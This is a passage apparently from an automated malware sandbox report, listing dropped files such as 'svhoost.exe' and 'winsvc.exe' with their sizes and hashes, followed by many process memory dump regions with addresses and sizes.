                                                                                      7dd155346acf611ffaf6399408f6409146fd724d7d382c7e143e3921e3d109563c314a0367a378b0965e427470f36bf6d70e1586d695a266f34aebd789965285

                                                                                    • C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
                                                                                      Filesize

                                                                                      304KB

                                                                                      MD5

                                                                                      15a7cae61788e4718d3c33abb7be6436

                                                                                      SHA1

                                                                                      62dac3a5d50c93c51f2ab4a5ebf78837dc7d3a9f

                                                                                      SHA256

                                                                                      bed71147aa297d95d2e2c67352fc06f7f631af3b7871ea148638ae66fc41e200

                                                                                      SHA512

                                                                                      5b3e3028523e95452be169bdfb966cd03ea5dbe34b7b98cf7482ca91b8317a0f4de224751d5a530ec23e72cbd6cc8e414d2d3726fefee9c30feab69dc348fa45

                                                                                    • C:\Windows\System32\winsvc.exe
                                                                                      Filesize

                                                                                      41.9MB

                                                                                      MD5

                                                                                      8553d31939741e4698883d288bdee930

                                                                                      SHA1

                                                                                      8e55aa60b082026e6ab0195b021f17f17ba58ff8

                                                                                      SHA256

                                                                                      5e32c5cc6d8afb6e484b8683c29ed55095112e58ba856057e938956b27083d12

                                                                                      SHA512

                                                                                      7cc75af3c5c25fea8c25995f478f2de544740b8a94ec3e2b55bbc61a6778ea20754a5fa37947fa21bef371e2b1bffa0dd3ace07daa409c43f0cf44a5537e0bb9

                                                                                    • memory/412-157-0x0000000000400000-0x0000000000450000-memory.dmp
                                                                                      Filesize

                                                                                      320KB

                                                                                    • memory/696-587-0x0000000000F50000-0x00000000013F5000-memory.dmp
                                                                                      Filesize

                                                                                      4.6MB

                                                                                    • memory/696-316-0x0000000000F50000-0x00000000013F5000-memory.dmp
                                                                                      Filesize

                                                                                      4.6MB

                                                                                    • memory/696-177-0x0000000000F50000-0x00000000013F5000-memory.dmp
                                                                                      Filesize

                                                                                      4.6MB

                                                                                    • memory/696-21-0x0000000000F50000-0x00000000013F5000-memory.dmp
                                                                                      Filesize

                                                                                      4.6MB

                                                                                    • memory/696-19-0x0000000000F51000-0x0000000000F7F000-memory.dmp
                                                                                      Filesize

                                                                                      184KB

                                                                                    • memory/696-492-0x0000000000F50000-0x00000000013F5000-memory.dmp
                                                                                      Filesize

                                                                                      4.6MB

                                                                                    • memory/696-18-0x0000000000F50000-0x00000000013F5000-memory.dmp
                                                                                      Filesize

                                                                                      4.6MB

                                                                                    • memory/696-20-0x0000000000F50000-0x00000000013F5000-memory.dmp
                                                                                      Filesize

                                                                                      4.6MB

                                                                                    • memory/1452-935-0x00000168C59E0000-0x00000168C59FA000-memory.dmp
                                                                                      Filesize

                                                                                      104KB

                                                                                    • memory/1452-934-0x00000168C5470000-0x00000168C547E000-memory.dmp
                                                                                      Filesize

                                                                                      56KB

                                                                                    • memory/1548-66-0x0000000000400000-0x0000000000592000-memory.dmp
                                                                                      Filesize

                                                                                      1.6MB

                                                                                    • memory/1872-139-0x0000000000610000-0x0000000000F68000-memory.dmp
                                                                                      Filesize

                                                                                      9.3MB

                                                                                    • memory/1872-182-0x0000000005A20000-0x0000000005ABC000-memory.dmp
                                                                                      Filesize

                                                                                      624KB

                                                                                    • memory/1872-181-0x0000000000610000-0x0000000000F68000-memory.dmp
                                                                                      Filesize

                                                                                      9.3MB

                                                                                    • memory/1872-180-0x0000000000610000-0x0000000000F68000-memory.dmp
                                                                                      Filesize

                                                                                      9.3MB

                                                                                    • memory/1872-614-0x0000000000610000-0x0000000000F68000-memory.dmp
                                                                                      Filesize

                                                                                      9.3MB

                                                                                    • memory/2608-206-0x0000000004D50000-0x0000000004D6C000-memory.dmp
                                                                                      Filesize

                                                                                      112KB

                                                                                    • memory/2608-203-0x00000000001D0000-0x000000000056C000-memory.dmp
                                                                                      Filesize

                                                                                      3.6MB

                                                                                    • memory/2608-236-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-234-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-232-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-230-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-228-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-226-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-224-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-222-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-220-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-218-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-216-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-214-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-212-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-210-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-208-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-207-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-262-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-260-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-258-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-256-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-254-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-252-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-238-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-205-0x0000000005050000-0x000000000513C000-memory.dmp
                                                                                      Filesize

                                                                                      944KB

                                                                                    • memory/2608-204-0x0000000004F40000-0x0000000005046000-memory.dmp
                                                                                      Filesize

                                                                                      1.0MB

                                                                                    • memory/2608-250-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-240-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-248-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-246-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-244-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2608-242-0x0000000004D50000-0x0000000004D65000-memory.dmp
                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/2772-65-0x0000000001490000-0x0000000001491000-memory.dmp
                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/2772-67-0x0000000001490000-0x0000000001491000-memory.dmp
                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/3200-158-0x0000000000F40000-0x0000000000F41000-memory.dmp
                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/3540-0-0x0000000000590000-0x0000000000A35000-memory.dmp
                                                                                      Filesize

                                                                                      4.6MB

                                                                                    • memory/3540-1-0x00000000778B4000-0x00000000778B6000-memory.dmp
                                                                                      Filesize

                                                                                      8KB

                                                                                    • memory/3540-2-0x0000000000591000-0x00000000005BF000-memory.dmp
                                                                                      Filesize

                                                                                      184KB

                                                                                    • memory/3540-3-0x0000000000590000-0x0000000000A35000-memory.dmp
                                                                                      Filesize

                                                                                      4.6MB

                                                                                    • memory/3540-5-0x0000000000590000-0x0000000000A35000-memory.dmp
                                                                                      Filesize

                                                                                      4.6MB

                                                                                    • memory/3540-17-0x0000000000590000-0x0000000000A35000-memory.dmp
                                                                                      Filesize

                                                                                      4.6MB

                                                                                    • memory/3828-176-0x00000000074C0000-0x0000000007510000-memory.dmp
                                                                                      Filesize

                                                                                      320KB

                                                                                    • memory/3828-109-0x0000000006520000-0x000000000653E000-memory.dmp
                                                                                      Filesize

                                                                                      120KB

                                                                                    • memory/3828-89-0x00000000006C0000-0x0000000000712000-memory.dmp
                                                                                      Filesize

                                                                                      328KB

                                                                                    • memory/3828-108-0x0000000005BF0000-0x0000000005C66000-memory.dmp
                                                                                      Filesize

                                                                                      472KB

                                                                                    • memory/4208-444-0x000001F3609C0000-0x000001F3609E2000-memory.dmp
                                                                                      Filesize

                                                                                      136KB

                                                                                    • memory/4472-46-0x00000000051B0000-0x00000000052BA000-memory.dmp
                                                                                      Filesize

                                                                                      1.0MB

                                                                                    • memory/4472-43-0x0000000004E60000-0x0000000004EF2000-memory.dmp
                                                                                      Filesize

                                                                                      584KB

                                                                                    • memory/4472-42-0x0000000005370000-0x0000000005914000-memory.dmp
                                                                                      Filesize

                                                                                      5.6MB

                                                                                    • memory/4472-47-0x0000000005080000-0x0000000005092000-memory.dmp
                                                                                      Filesize

                                                                                      72KB

                                                                                    • memory/4472-140-0x0000000005AA0000-0x0000000005B06000-memory.dmp
                                                                                      Filesize

                                                                                      408KB

                                                                                    • memory/4472-184-0x0000000007E90000-0x00000000083BC000-memory.dmp
                                                                                      Filesize

                                                                                      5.2MB

                                                                                    • memory/4472-183-0x0000000006CA0000-0x0000000006E62000-memory.dmp
                                                                                      Filesize

                                                                                      1.8MB

                                                                                    • memory/4472-40-0x00000000734CE000-0x00000000734CF000-memory.dmp
                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/4472-44-0x0000000004E10000-0x0000000004E1A000-memory.dmp
                                                                                      Filesize

                                                                                      40KB

                                                                                    • memory/4472-45-0x0000000005F40000-0x0000000006558000-memory.dmp
                                                                                      Filesize

                                                                                      6.1MB

                                                                                    • memory/4472-41-0x00000000003B0000-0x0000000000400000-memory.dmp
                                                                                      Filesize

                                                                                      320KB

                                                                                    • memory/4472-48-0x00000000050E0000-0x000000000511C000-memory.dmp
                                                                                      Filesize

                                                                                      240KB

                                                                                    • memory/4472-49-0x0000000005130000-0x000000000517C000-memory.dmp
                                                                                      Filesize

                                                                                      304KB

                                                                                    • memory/4612-503-0x0000000008770000-0x00000000087BC000-memory.dmp
                                                                                      Filesize

                                                                                      304KB

                                                                                    • memory/4612-473-0x0000000000400000-0x0000000000470000-memory.dmp
                                                                                      Filesize

                                                                                      448KB

                                                                                    • memory/4812-319-0x000000001C7C0000-0x000000001C7FC000-memory.dmp
                                                                                      Filesize

                                                                                      240KB

                                                                                    • memory/4812-317-0x000000001E7A0000-0x000000001E8AA000-memory.dmp
                                                                                      Filesize

                                                                                      1.0MB

                                                                                    • memory/4812-107-0x0000000000C70000-0x0000000000CDC000-memory.dmp
                                                                                      Filesize

                                                                                      432KB

                                                                                    • memory/4812-318-0x000000001BA50000-0x000000001BA62000-memory.dmp
                                                                                      Filesize

                                                                                      72KB

                                                                                    • memory/5304-849-0x000001D0B2100000-0x000001D0B21B5000-memory.dmp
                                                                                      Filesize

                                                                                      724KB

                                                                                    • memory/5496-615-0x0000000000F50000-0x00000000013F5000-memory.dmp
                                                                                      Filesize

                                                                                      4.6MB

                                                                                    • memory/5496-617-0x0000000000F50000-0x00000000013F5000-memory.dmp
                                                                                      Filesize

                                                                                      4.6MB

                                                                                    • memory/5988-974-0x0000000000F50000-0x00000000013F5000-memory.dmp
                                                                                      Filesize

                                                                                      4.6MB

                                                                                    • memory/5988-972-0x0000000000F50000-0x00000000013F5000-memory.dmp
                                                                                      Filesize

                                                                                      4.6MB

                                                                                    • memory/6012-640-0x0000028458220000-0x000002845822A000-memory.dmp
                                                                                      Filesize

                                                                                      40KB

                                                                                    • memory/6012-639-0x0000028470700000-0x0000028470712000-memory.dmp
                                                                                      Filesize

                                                                                      72KB

                                                                                    • memory/6096-821-0x000002CE2D340000-0x000002CE2D35C000-memory.dmp
                                                                                      Filesize

                                                                                      112KB

                                                                                    • memory/6096-824-0x000002CE2D330000-0x000002CE2D338000-memory.dmp
                                                                                      Filesize

                                                                                      32KB

                                                                                    • memory/6096-825-0x000002CE2D360000-0x000002CE2D366000-memory.dmp
                                                                                      Filesize

                                                                                      24KB

                                                                                    • memory/6096-826-0x000002CE2D370000-0x000002CE2D37A000-memory.dmp
                                                                                      Filesize

                                                                                      40KB

                                                                                    • memory/6096-823-0x000002CE2D380000-0x000002CE2D39A000-memory.dmp
                                                                                      Filesize

                                                                                      104KB

                                                                                    • memory/6096-822-0x000002CE2D320000-0x000002CE2D32A000-memory.dmp
                                                                                      Filesize

                                                                                      40KB

                                                                                    • memory/6096-818-0x000002CE2D1D0000-0x000002CE2D1DA000-memory.dmp
                                                                                      Filesize

                                                                                      40KB

                                                                                    • memory/6096-816-0x000002CE2D0F0000-0x000002CE2D10C000-memory.dmp
                                                                                      Filesize

                                                                                      112KB

                                                                                    • memory/6096-817-0x000002CE2D110000-0x000002CE2D1C5000-memory.dmp
                                                                                      Filesize

                                                                                      724KB